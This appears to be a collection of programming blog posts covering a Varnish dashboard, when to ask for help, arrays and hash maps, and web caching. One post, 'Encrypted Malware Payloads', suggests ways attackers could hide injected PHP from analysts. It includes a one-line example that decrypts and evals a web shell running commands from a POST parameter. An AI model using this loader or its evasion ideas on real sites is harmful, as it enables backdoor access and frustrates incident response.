Enhanced Varnish Dashboard

I run Varnish on a number of servers, and I don’t always have a full metrics setup (e.g. Graphite/Statsd/Collectd) setup. Also, sometimes I just want a real time dashboard to watch traffic (or my clients do).

I’ve been using Varnish Agent 2 + the ITLinuxCL dashboard, which is lacking to say the least. The dashboard isn’t maintained, is very minimal, and somewhat broken. So I set out to build my own dashboard.

I wanted to make good use of the Varnish Agent API, so I added capabilities to purge URLs, view/upload VCLs, view params, logs, etc. I also added support for multiple Varnish backends, so you could host the dashboard somewhere else and just point it at multiple Varnish instances. This is currently held up until I get a patch merged into vagent to add CORS headers (currently pending review).

There are screenshots on GitHub, so check it out: https://github.com/brandonwamboldt/varnish-dashboard

Before asking for help, make sure you understand your tools

I’m writing this blog post in response to Why Rockstar Developers don’t Ask for Help and So you want to be a Developer Rockstar?. Despite the use of the ridiculous term “Rockstar Developer” and quite a lot of humble bragging, I think the author is on to something, but just barely missed the mark.

I wouldn’t say that good developers shouldn’t ever ask for help, that’s crazyness. I’d change the wording a bit:

Try not to ask for help if you don’t understand the tools/software that you’re having problems with

What do I mean? If you’re trying to figure out how to rebase your branch in Git, or why PHPUnit isn’t running, or how to fix a particular C error, you’re probably uneducated about something relevant to the problem (e.g. you don’t understand rebasing or Git’s internal data representation). If you learn more about Git, you’ll have the understanding to fix the problem, and probably many more related problems (or variations of the same problem). On the other hand, if you just ask your co-worker for the command to rebase a branch, you don’t understand what is happening or why it works, so the problem remains. Put in the time to learn your tools, libraries, frameworks, etc.

If people took the time to learn instead of trying to barely skate by with as little effort as possible, there would be far fewer interruptions in the work place, far more productive and well educated developers, and significantly less noise on StackOverflow.

Of course this isn’t always the case. Sometimes you reach the point where you’ve spent too much time on the problem and need help getting to the next step. Or maybe you’re so lost you don’t even know where to start (in which case you should ask for pointers, not a complete answer). And of course, you may not have the time to learn something well enough to continue due to deadlines, but if this is the case, you should definitely follow up afterwards when you aren’t racing the clock.

When should you ask for help? A common type of problem is when something should be working. You understand the system and what’s going on, but it’s not working the way you’d expect. You aren’t blindly running commands with no understanding of how or why they work. Maybe you’ve overlooked something, or it’s just some small thing your co-worker will point out right away. I think these types of problems are fine to get help with.

Likewise, domain specific knowledge where you need an understanding of the business are typically fine to ask a co-worker about. How do you interface with this heavy duty crane transmission, what does this scientific shorthand mean, or what are the rules around who can access what content?

I also want to point out that this doesn’t apply to getting feedback, such as asking a co-worker for feedback on your design, approach, or code.

Understanding Arrays

Arrays & hash maps are one of the cornerstones of modern computer programming. It’s almost impossible to write a useful program without them, so it’s critical that you understand them when you’re getting started with programming. In this post, I’ll explain arrays & hash maps, how they work, their differences, and when to use them.

Arrays

Arrays are a numerically indexed collection of items. In dynamically typed languages like PHP, Python, and Ruby, arrays can contain any value. You define an array like this:

my_array = ["orange", "red", "blue"]

Here, we are creating an array named “my_array”. [ and ] are very common ways of creating arrays in most languages. The array defined above has 3 string values. We can access the values using their numerical index. Most programming languages use zero-indexed arrays, meaning the first item starts at 0:

print my_array[0] // Prints "orange"
print my_array[1] // Prints "red"
print my_array[2] // Prints "blue"

We can add items to an array using several methods, the simplest of which is just setting the numerical index directly:

my_array[3] = "purple"
print my_array[3] // Prints "purple"

Note: arrays in compiled languages usually have a fixed size, and you must create a new array if you want to add additional items. I won’t really go into that here.

You can iterate over each item in an array using multiple methods, but the most common method is a for loop (or the foreach loop in some languages):

for color in my_array:
    print color

The above code will print:

orange
red
blue
purple

The for loop operates one item at a time, traditionally assigning the item to a variable (color) and then executing the body of the loop (print color) for each item.

Hash Maps

Hash maps, also called hash tables, dictionaries, or associative arrays, are a data structure very similar to arrays. They are a collection of items, indexed with a key. Unlike arrays, hash map keys can be strings or numbers instead of just numbers. Hash maps are traditionally unordered, but some implementations maintain order (JSON doesn’t for example, but PHP does).

Many new programmers think hash maps are just arrays as some languages (e.g. PHP and JavaScript) only have hash maps, which they call arrays. Hash maps can function just like normal arrays, albeit less efficiently in most cases.

Some languages have a different syntax for hash maps than arrays (e.g. Python) and others don’t (PHP). Here is an example of creating a hash map:

my_hashmap = { "name": "Brandon", "age": "22", "country": "Canada" }

This creates a hash map, with 3 keys, name, age, and country. I can add a new attribute just like I would with an array:

my_hashmap["occupation"] = "Programmer"

And I can iterate over a hash map similarly to an array, but not quite the same:

for key in my_hashmap:
    print "My " + key + " is " + my_hashmap[key]

Here, for every item in the hash map, I assign the key to the variable key. Then I get the value from the hash map (example, the first iteration would assign the key “name” to the variable key, and calling my_hashmap[key] is the same as calling my_hashmap["name"] which returns “Brandon”).

Arrays of Hash Maps

It’s very common to see an array of objects or an array of arrays, which can be confusing at first. Take the following example:

employees = [
    {"name": "Oliver Queen", "role": "C.E.O."}, 
    {"name": "Felicity Smoak", "role": "IT Support"}, 
    {"name": "John Diggle", "role": "Body Guard"}
]

Now, say you want to print out each employee’s name and role. This is very easy:

for employee in employees:
    print employee["name"] + ", " + employee["role"]

Which outputs:

Oliver Queen, C.E.O.
Felicity Smoak, IT Support
John Diggle, Body Guard

Nested Hash Maps

Nested hash maps are another common occurence in programming (especially APIs). Take this example:

person = { "name": { "first": "Brandon", "last": "Wamboldt" } }

To access a nested attribute, you simply chain keys like so:

print person["name"]["first"] // Prints "Brandon"

This works with arrays too:

things = [["purple", "green", "orange"], ["apple", "orange", "banana"]]
print things[0][0] // Prints "purple"
print things[1][2] // Prints "banana"

Encrypted Malware Payloads

Recently, I was reading an article on the recently discovered hacker group dubbed the Equation Group[1], I stumbled across an interesting concept: encrypted malware payloads. Most server admins will inevitably have the experience of dealing with a comprised system, especially if you host sites running WordPress[2][3], IPB[4], vBulletin[5], Drupal[6], or a host of other systems which tend to exhibit a high number of easy to remotely exploit vulnerabilities (sometimes in the core software, more frequently in plugins). I’ve dealt with a number of compromised sites, analyzing the PHP that was injected into them.

Typically, what I’ve seen and what appears to be common, is an obfuscated payload, using base64 encoded strings and the eval() function (which executes a string as PHP code[7]). These are easy to spot (malicious PHP code normally is) and easy to de-obfuscate, determining the purpose of the code. I recently went through that process on a newly acquired client’s site, discovering that the payload was a spammy backlink page designed to improve S.E.O. for target sites by injecting links whenever the Google bot requested the page.

It’s now occurred to me, that hackers & spammers would be better off encrypting their payloads in situations like this, but I almost never see that for some reason. There are three types of common hacks: hackers inject some sort of control panel that lets them do all sorts of things like read the file system and run arbitrary commands/code, spammy backlink pages like I described above, and “other” hacks like defacing a site. The first two are highly targeted attacks that may be suitable for encrypted payloads. The key for encrypting the payload is the key must somewhat difficult to determine, so it has to be external.

In the first case, you could use a random POST parameter to supply your encryption key. POST parameters have the advantage that they are rarely logged. If your code is run on every page, you could simply to a non-suspicious POST to some arbitrary page (e.g. the home page, or for even less suspicion, a page with a form on it).

For targeted attacks like SEO pages, you could use the user agent. While they could be pretty easy to determine, it does make the process more difficult and tedious.

Of course, encrypted payloads will stand out just as much as base64 encoded payloads, but at least their purposes would remain a secret. Here is an example:

<?php
eval(openssl_decrypt('V1MrPqUg83vX83Hc6qgIYnhXFB3T971/9ZGj6RIYG/8=', 'aes128', $_POST['key'], 0, "0123456789ABCDEF"));

This takes a password from a POST parameter named key. The decoded payload simply runs eval() on the contents of the cmd POST parameter. You could get more sophisticated and fall back to mcrypt if openssl isn’t available, maybe even include a pure PHP library.

Just food for thought.

Basics Of Scaling: Cache Everything

I do a lot of work on websites that needs to scale fairly well, but I tend to use that mentality for every project. Part of scaling is performance, and the better your app performs (e.g. the more requests per second it can handle) the cheaper it is.

One very easy way to improve your application’s performance is to add caching. If you don’t currently have caching, you’ll probably see a massive benefit, depending on your application architecture. There are many different types of caching, with varying degrees if difficulty to implement.

I’ve included some very surface level details on caching in this post. These posts aren’t meant to be comprehensive tutorials, but to make you aware of various techniques used to scale your applications better.

HTTP Accelerators/Reverse Proxies

You have HTTP accelerator style caching such as Varnish, which tend to be very easy to setup and can give you huge performance improvements if you have a lot of cacheable content (e.g. on a WordPress blog). Varnish is one of my goto resources for fast and easy scaling. Instead of having Apache or Nginx as your public facing server component, you’d have Varnish. You set Varnish to listen on port 80, and you’d change Apache/Nginx/Whatever to listen on an alternate port like 8080.

You configure Varnish with Apache/Nginx as a backend, where it will direct requests that aren’t currently cached. That’s all you need for a very basic setup, but it’s likely you’ll want to customize Varnish’s caching logic to be a bit more permissive (for example, Varnish won’t cache a page if there are cookies in the request). I’ll leave the detailed setup instructions for another blog post, since it’s a very large topic (you can search for some tutorials to get started).

Varnish can be the key to saving your website from crashing during large traffic spikes (like if you get posted to Reddit or another popular site). When properly configured, Varnish can continue serving up cached pages even if the backend is offline. Also, Varnish stores it’s cache in memory and is highly optimized at what it does (for example, it does very few system calls to avoid frequent context switching, they’ve implemented most system calls themselves, in user space).

Page Caches

Then you have page caching techniques within your application. WordPress, Symfony, and Rails for example, all have mechanisms to cache the output of pages as static files and use those, skipping much of the slow parts of your application (e.g. database queries). Some systems even allow you to store page caches in memory instead of on the filesystem, using a builtin mechanism or an external application like memcached.

Page caching techniques vary wildly depending on your application or framework, so I won’t go too deep into it here.

The gist of it is that if you have pages filled with content that doesn’t change super frequently and isn’t dynamic for every request, you can typically render it out to a static file and serve that until the content changes. This avoids the overhead of database calls and complicated application logic, but still has high overhead as most dynamic languages like Ruby/Python/PHP have a lot of overhead for every request. It’s at least an order of magnitude slower for these languages to serve a cached resource than Varnish.

Also worth noting is that many systems including Varnish support something called Edge-Side Includes (similarly there are Server-Side Includes). If the majority of your page is static, but there are one or two dynamic parts (e.g. user details), you can statically cache the page and use a ESI or SSI to include the dynamic parts when the page is served. This tends to be higher performance than re-rendering the entire page (again, this varies based on your individual application).

Another technique to improve the cache-ability of your pages for both page caching and reverse proxies is to use AJAX to fill in dynamic data after the page loads. One of my websites has every page cached, so I use AJAX to populate user data. Once the page loads, I make a request to a JSON endpoint (not cached) which returns the user’s current info. I then use JavaScript to place this in the page.

In-Memory Caching

Another very common technique for caching is using an in-memory data store like Redis or Memcached, located on the same machine as the webserver (sometimes this isn’t the case though). You use these in-memory data stores to temporarily store data that is very slow to compute. Then in your application, you’d check the memory store first, and if it’s not there, you fall back to the actual code. After computing the results, you should then add it to the memory store.

Examples of using this are for caching database calls (example: you have a settings table that you fetch every request. It’s far faster to store it in memory than to do a database call every request), or slow computations. You shouldn’t use in-memory data stores for any information you want to keep, as they are considered volatile storage (nothing persists after a restart).

Some programming languages also support shared memory built right into the language. These systems allow you to cache data in a shared block of memory and access it from any process. However, I recommend using memcached or something similar instead, as they tend to be more powerful and well optimized.

Cache Busting

Cache busting is the action of clearing/deleting/expiring a cache item. It’s commonly used when a resource has changed (for example, my blog cache busts Varnish whenever I write a new post). It’s commonly a source of confusion or issues when caching is newly introduced (why can’t I see my changes?). Most frameworks have libraries for dealing with this, but if you’re going with a homegrown approach, it’s important to consider this. You may want to hook into your models to clear relevant caches for example.

Closing Notes

Caching is used heavily by every large website (e.g. Facebook/Google/Twitter/etc). Facebook operates one of the largest memcached clusters in the world, consisting of hundreds of terabytes of RAM[1][2]. These websites save millions of dollars a year in server resources by employing a multitude of caching techniques.

Another lesson that is often learned the hard way, caching can be a nightmare if you don’t design your application with caching in mind from the very beginning. Adding caching in after the fact will cause many issues (e.g. resources not being cache busted automatically when a resource is changed). Naming is the other very important part of caching. It pays off to think of a good, scalable naming scheme before you get started.

If you haven’t already read them, I’d recommend checking out my other blog posts on the basics of scaling: